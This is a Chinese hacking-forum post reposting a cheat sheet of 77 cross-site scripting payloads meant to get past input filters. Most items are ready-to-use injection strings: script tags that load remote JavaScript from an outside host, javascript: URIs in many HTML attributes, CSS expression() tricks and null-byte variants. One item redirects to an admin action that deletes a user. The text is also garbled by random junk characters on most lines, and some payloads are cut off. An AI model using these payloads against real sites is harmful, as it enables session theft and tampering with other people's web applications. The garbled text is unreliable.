貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。! z2 i# F3 ~/ I j' F
$ o5 q' j" _5 g, y0 M
(1)普通的XSS JavaScript注入3 f' Q6 `* N6 e: ~3 N$ l% [. Y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! m$ q/ Q7 a! H. I; H/ I. N) z
! D' e* `# I# x (2)IMG标签XSS使用JavaScript命令
5 |1 l2 [ r, [ <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% }7 y8 S5 X( @. }+ O; A# y
+ L6 c- X. V" z0 r6 y' A
(3)IMG标签无分号无引号
; t& j. b+ g6 D6 ` <IMG SRC=javascript:alert(‘XSS’)>/ J9 b& _, ^6 |& z1 Q3 X1 ~( a
6 }' c% l. g( G( e E3 R: H
(4)IMG标签大小写不敏感% j- _8 `6 v/ }/ e
<IMG SRC=JaVaScRiPt:alert(‘XSS’)> }4 ?4 E' a; _2 e
/ K8 J/ d8 E: @4 i4 S, f% p
(5)HTML编码(必须有分号)4 ` R" u* O% I- I8 l3 D4 |
<IMG SRC=javascript:alert(“XSS”)>
! F7 F; I! Y3 x. n) s# n9 B9 Q4 ? ` V
(6)修正缺陷IMG标签+ j' ?7 w* Q: A0 D( r2 l
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>& ?; }8 V; @7 e j
2 a& S* @3 O/ W6 p$ V
(7)formCharCode标签(计算器)! I4 N. l; @2 w4 L( V3 H
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 h, y" w( r$ }. q' x; q
7 j: k* b) e$ w' d! ~! r/ i (8)UTF-8的Unicode编码(计算器)4 K; s$ r$ X; r2 R. j
<IMG SRC=jav..省略..S')>5 i' j/ `7 _$ O3 b3 E* u
{ w* Z3 y4 E (9)7位的UTF-8的Unicode编码是没有分号的(计算器)( v4 T/ ?4 Y. Y. D
<IMG SRC=jav..省略..S')>
- x( ~" G6 @3 n# s% k. }1 w4 Y/ M3 o7 q& e$ \ O
(10)十六进制编码也是没有分号(计算器)' S. J: D( D/ Q
<IMG SRC=java..省略..XSS')>" R# b7 W* f+ m- q
3 ~% H, C* `+ q0 U; ?) F- W/ M (11)嵌入式标签,将Javascript分开4 h# g) F1 u! \4 D4 o j6 w0 z$ z* e
<IMG SRC=”jav ascript:alert(‘XSS’);”>
q. r" ^; x. l% Y+ t+ H, e+ l! O6 Y
(12)嵌入式编码标签,将Javascript分开6 p* n$ _5 G: c) i9 a- t. T, d
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# N7 o6 j# F [; b
' p X5 h# g: n( ~& r T (13)嵌入式换行符+ N0 s( H) L. B3 b! P2 k
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 U/ ~/ ^9 T$ s$ {5 t9 l6 ?* O" d) t# _* u
(14)嵌入式回车
# [3 B( H3 m* k4 O4 Z6 O% W) }1 x <IMG SRC=”jav ascript:alert(‘XSS’);”>! ?5 B1 {) U4 n6 W( p Y
! x/ `( t+ d# t) t1 |8 w, o! o/ u
(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 M& P# E5 ]$ a _$ e N
<IMG SRC=”javascript:alert(‘XSS‘)”>9 v3 N- ?- `9 _3 K h* M
$ o5 W) b3 I. z9 O2 _) | (16)解决限制字符(要求同页面)
$ S5 z5 d' ~5 s* G* ^6 c2 O <script>z=’document.’</script>
! ^. q$ K6 B& E+ C m0 {0 i <script>z=z+’write(“‘</script>
' A4 ?( `+ w/ `8 q Q2 {& E <script>z=z+’<script’</script>4 B: i! _! W8 v. o/ K% w$ T
<script>z=z+’ src=ht’</script>
8 L N1 T6 u$ G7 H! b <script>z=z+’tp://ww’</script>
2 ~: L" ^# T, T% L' h# H1 W <script>z=z+’w.shell’</script>
' U/ p j/ y2 t- Y3 w <script>z=z+’.net/1.’</script>
) {( y/ a* |5 [( H% o4 R9 W( F% K) j <script>z=z+’js></sc’</script>
0 w+ g+ c1 ]1 \ E( l <script>z=z+’ript>”)’</script>) m% y2 S. g8 {/ _0 U/ y7 S
<script>eval_r(z)</script>
$ ?& i5 F+ }& K0 Y f9 x- l$ j: s7 y% I: z/ S
(17)空字符( t' e9 Y, g7 w
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ C) E# Z0 i) u7 f; T9 ~
2 I% ~! T; e/ z (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) S1 N* I4 _; ^1 J; }
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ G& ]* q$ v, k7 R$ @" g$ A6 Y; o( r( _5 ~$ K N6 }
(19)Spaces和meta前的IMG标签
% D1 V' q. w7 Z* j$ w: x( [ <IMG SRC=” � javascript:alert(‘XSS’);”>. w9 T4 Y! H! P, l6 c
* e' i. ?" q: P: I; S W* W# S (20)Non-alpha-non-digit XSS5 X- X' J3 ?: {/ [/ K) d- z
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>( l8 f @, e6 k0 ?# }* e. r. O; L
. M8 U$ ^4 V0 E* a: ]
(21)Non-alpha-non-digit XSS to 27 y7 ?% O0 A1 J8 l! _
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 L- J- q1 y" }8 _
9 w4 I% c' f- a" E (22)Non-alpha-non-digit XSS to 3
( d4 F4 E S4 V <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* \2 w3 g Q5 ^ ? |5 S* T0 Y# C0 ^" {' W
(23)双开括号& b% c3 t& c b. K; y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>" D+ u, e( u _6 i, Y% g% b
% u- @# k& d6 S" z3 l% H/ M. r% p (24)无结束脚本标记(仅火狐等浏览器)
5 h) w+ d6 S6 w9 N1 X2 J% h9 d" G2 P <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>" K" p5 Y* Y% Y
9 K3 Z! A5 k) ]; N (25)无结束脚本标记2: O$ l$ r) ^! B9 ] R2 ^3 \
<SCRIPT SRC=//3w.org/XSS/xss.js>
; ?1 R* r4 C1 D9 q
2 g4 P8 \0 n R+ S9 _* A6 @ (26)半开的HTML/JavaScript XSS3 a6 C( w" F y5 i
<IMG SRC=”javascript:alert(‘XSS’)”
4 }9 r- F$ A8 f% {# U4 h5 x/ E! O
8 M. w$ e! a8 J [, l (27)双开角括号5 y8 ]3 X/ O/ _4 S4 N# I; Q( z
<iframe src=http://3w.org/XSS.html <
, z7 a- C q: j1 m4 X4 v7 g
. m: j4 C* Z1 {1 L7 i4 b7 u. j7 N (28)无单引号 双引号 分号
) U; N8 M0 n4 C) x% _! K7 J \ <SCRIPT>a=/XSS/
0 X) U, |7 R' M# j" K3 c alert(a.source)</SCRIPT>& a# @ O$ D3 E3 c' C) H
1 g x/ h$ _3 P, }+ A1 V% a' t. f
(29)换码过滤的JavaScript
3 G) \& t2 s, K* c9 a9 z \”;alert(‘XSS’);//! ?, H' V- K \$ X. v
/ ]' \! g0 ]% _& A( v' s5 ^* B
(30)结束Title标签 A, e* {6 m! Y, b
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# a; D0 O7 L _; o F# b5 F3 ]+ _7 n; c/ C4 L; B6 @% p' ~* X, L: d/ m
(31)Input Image" r/ K k' m- X% Y
<INPUT SRC=”javascript:alert(‘XSS’);”>8 o# d X5 p+ k
; M6 p. s3 L: j( w( k
(32)BODY Image
# B% L, V ?1 I* q) K# E <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
1 a- K" s O0 f5 t( N' A7 ]$ S+ e v5 Q; e: y7 ?, U
(33)BODY标签
5 y; E9 o( [4 u7 p <BODY(‘XSS’)>6 P0 P2 @. G; L2 E8 N& D4 |' o
f9 R6 ^, W) I/ S2 }! Q
(34)IMG Dynsrc
5 E1 x S+ j3 l- B) d* G% x0 K <IMG DYNSRC=”javascript:alert(‘XSS’)”>3 T$ \& X9 S, |/ Q9 E% u& m2 M
/ @1 c5 N f) A, }( J) g (35)IMG Lowsrc
9 ~, C3 J/ C! \2 v4 E! P <IMG LOWSRC=”javascript:alert(‘XSS’)”>
1 _+ P0 K5 y& T' M+ _9 p7 V9 d8 U( I: M4 P
(36)BGSOUND
$ O2 T2 ~0 X5 V/ q6 B2 u. K9 m <BGSOUND SRC=”javascript:alert(‘XSS’);”>) \/ q$ k+ |! K, j; z9 E
7 @; r2 F! I- `# X (37)STYLE sheet* t, [+ V+ U7 r: a; J, S
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ T/ `+ F. w2 U6 n9 T
$ u, z1 J9 B& _8 K (38)远程样式表
0 e6 ], y; S5 v% ]! j0 i t, g <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 B( @7 m+ a, u6 B" ]# b
% J- y6 M3 T2 q' ~8 a! U) B
(39)List-style-image(列表式)
* `& W, \9 R! X; |/ l <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
8 |6 Q' v; J4 H) ]1 I
( W3 O- i# M* J7 l+ l* p- J9 G4 a) Y (40)IMG VBscript
* s& N, N0 X) B! @" b <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS' U6 ], v/ {4 Y3 p2 i" |
9 D$ b$ s- s% f/ @6 f
(41)META链接url. I, T4 p9 }, c7 B
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>1 E" P0 o1 U; c* L3 p2 {
$ c2 Y5 X0 i% g! f" N
(42)Iframe4 ~7 A& Y- K0 {9 V
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 y3 N5 C9 @" d" X1 x+ h( m
0 {1 u# v! a# v (43)Frame) U' ^$ q3 c% h/ A! m/ l
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>" g/ ?- q; u5 e$ o
# p+ m4 L# u9 t1 r7 ^
(44)Table0 G+ E E. L: m9 H& V& p: |& J
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>; \* I$ ]! j) P" i
# V, V. I) P) z" n
(45)TD3 \9 |' {0 X/ W# j3 N* j I
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# P# O$ ^3 D7 j* y4 J' y" |9 _* X" q
(46)DIV background-image
9 j% N% U* c$ \3 O: F# B <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ I: _( Z, i7 L4 h& j9 }
3 r) x j% h+ i& p f (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, l }9 j4 @& l3 Y <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>3 j5 V# b% q( | M$ W- |' a) B; |' F, _
4 Q2 k* h3 P8 U+ S (48)DIV expression/ J+ y* g/ p: j Y! n, C7 y4 t
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>% Q, S5 a* f1 B0 x! z+ U/ N) N5 k
4 x; k, ^2 _2 x% V8 `
(49)STYLE属性分拆表达8 `* K* s; x, j' e
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 ]" `2 Y4 z" o. ^
' q- F% n% s5 n3 N. ^2 k
(50)匿名STYLE(组成:开角号和一个字母开头)
5 ]% @6 G R6 t7 V: b, E# U <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& u2 Z, M" {! i9 x; ~4 X
. B6 b2 N' b4 ]7 Y1 D
(51)STYLE background-image. v4 Y4 _/ O) V$ Q5 q. y' w
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: w5 J. E. g1 [+ P/ v4 T% z" j1 M2 o& a8 T) m6 o
(52)IMG STYLE方式: A* w' r+ X# h1 d- `8 Y! t- b
exppression(alert(“XSS”))’>7 A, |! X3 o! I
6 d3 w, \! k% m6 }9 h# ` (53)STYLE background$ [8 J0 r/ v6 a- _
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 r2 R. n7 k0 [. x3 |0 I! E' F+ [, R _8 Z
(54)BASE
: F, ]! f M& t% ~ <BASE HREF=”javascript:alert(‘XSS’);//”>! o; }7 X! G% X. I" n: }
" c2 l p; N4 P
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
% F3 j z: `5 `9 X <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
" F% b W1 ~ r4 w8 a7 z6 ]+ |; s+ B1 q; b* ~) D' j3 ?
(56)在flash中使用ActionScrpt可以混进你XSS的代码6 Z' G: X W9 F- ]$ z( t
a=”get”;
8 k4 l0 b$ T c- Y% @ b=”URL(\”";
, U3 C0 n4 B2 \$ a& Y* H& d/ E c=”javascript:”;
% Z+ T# [) l1 I7 d; ]0 t) w d=”alert(‘XSS’);\”)”;
% t2 O2 `* q, G: K eval_r(a+b+c+d);
( U5 ]2 n* L/ `( w0 M3 T, q
) i% D6 P- T6 e8 w, Q (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上: N% _" P0 j$ p9 X/ P
<HTML xmlns:xss>
1 C: ^9 H& ]+ h2 D# o1 d4 f' a: M <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>* o* g. L2 t# P+ x0 |. W
<xss:xss>XSS</xss:xss>9 O$ y: Q2 ?4 W0 U5 K5 Y5 [- j* A
</HTML>9 v" b9 L' g8 O. j3 Z" _
/ J# ]/ {8 P3 R( e* B1 T (58)如果过滤了你的JS你可以在图片里添加JS代码来利用" s$ S3 D/ S& M, `+ d; X
<SCRIPT SRC=””></SCRIPT>/ L* l; X n+ f, O1 s
6 J- z" n2 w {4 E; ]" [. G; t (59)IMG嵌入式命令,可执行任意命令8 V4 C9 u$ d( r7 |, M9 s# @: j
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' y8 o0 q Q) c: q G1 y+ Y% Y9 W" b; b+ ?% H+ v. E9 a
(60)IMG嵌入式命令(a.jpg在同服务器)! H9 w7 a" Y, R6 b3 W3 E" L) }; C
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- z/ ?9 V2 ^' ^0 r" T! u# l
' P$ l* K4 r( v" W* V5 ~2 r (61)绕符号过滤
/ Y" e( e3 r- H" |% _, g7 v <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>* _5 a0 l* K: z
# ] _: Y8 t* @" r; @* X8 g. {
(62)1 t2 A% R- h( j6 F
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 o0 ^! c, s8 _/ \8 G
% @- h9 t) e/ C* |. _7 a4 [ (63)
# ~9 z) |8 H! a8 b$ y; A, v <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
" D, _. S5 d7 k- C- C6 h
* h' i* q# _7 I0 _. R/ X (64)8 l! O8 n M( u- ?5 r, i& l* {% S& ^
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
" H3 m3 y, v2 Z: U/ n. O5 g0 x3 } ]; o3 }, T' i0 Q
(65)" _0 W8 s. y; q. e+ y- F- T
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! E7 b+ H" }5 f9 r5 A4 E$ e" q+ \, i, V, j
(66)
3 U; A! o# j: v0 |; @ <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>% e1 i9 c3 w% m& ~0 J. y; ~
* R$ q& `0 m2 l0 \. H2 u$ m, z' L (67)0 I% p1 o* B) j; S$ U0 [
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>2 T: l f0 K" |
- D2 |' a/ l8 z (68)URL绕行/ Q; F8 H; w9 b, p1 A: E
<A HREF=”http://127.0.0.1/”>XSS</A>
# x1 m. F$ F( [+ ~, G) \7 l4 Y
2 z: ~) ^: a6 P (69)URL编码4 p1 L" g M6 ^: T
<A HREF=”http://3w.org”>XSS</A>( q2 t/ ]# v- v& s
/ [/ V1 G- a* Q2 K# `9 e! A
(70)IP十进制
& W: j1 _! L! j7 A <A HREF=”http://3232235521″>XSS</A>
5 _$ C/ R* O1 ?: Y: m& K% q6 s8 h
# `4 V5 V0 \" j' S1 ]* D9 h (71)IP十六进制5 b9 m6 v9 `% D
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
) t; b( X* m4 H3 R0 ?- H. @( [% O6 Q3 W3 o4 T/ U4 K. D
(72)IP八进制; {/ d ]* P# t% s
<A HREF=”http://0300.0250.0000.0001″>XSS</A>. n8 F7 H, t( K3 _
5 ^0 j# W! ^( k! H. f$ l
(73)混合编码
% ?5 u9 g9 h2 U1 s0 ] <A HREF=”h
& U; H+ f: z9 e" `# U/ C; `2 W; l. v tt p://6 6.000146.0×7.147/”">XSS</A>, q' F& n6 @8 M- C$ j
, S4 I$ C* [ V( o( F8 [) `
(74)节省[http:]6 c; I. ]3 K0 r, h: U9 K
<A HREF=”//www.google.com/”>XSS</A>
& a6 h/ ]8 E1 s( ^: H- T$ ]
3 |, B5 J# ~" \! p (75)节省[www]
8 _% i7 m+ ], q <A HREF=”http://google.com/”>XSS</A>
' O s8 u2 n) a5 z
% V( e7 N, p) u (76)绝对点绝对DNS
2 V0 Z7 @9 T1 I <A HREF=”http://www.google.com./”>XSS</A>6 `3 }; ~6 F6 S' ]; \
. z% P6 ?* v9 S( J( a3 s `
(77)javascript链接 w9 Z& y6 g, ~9 W) u
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对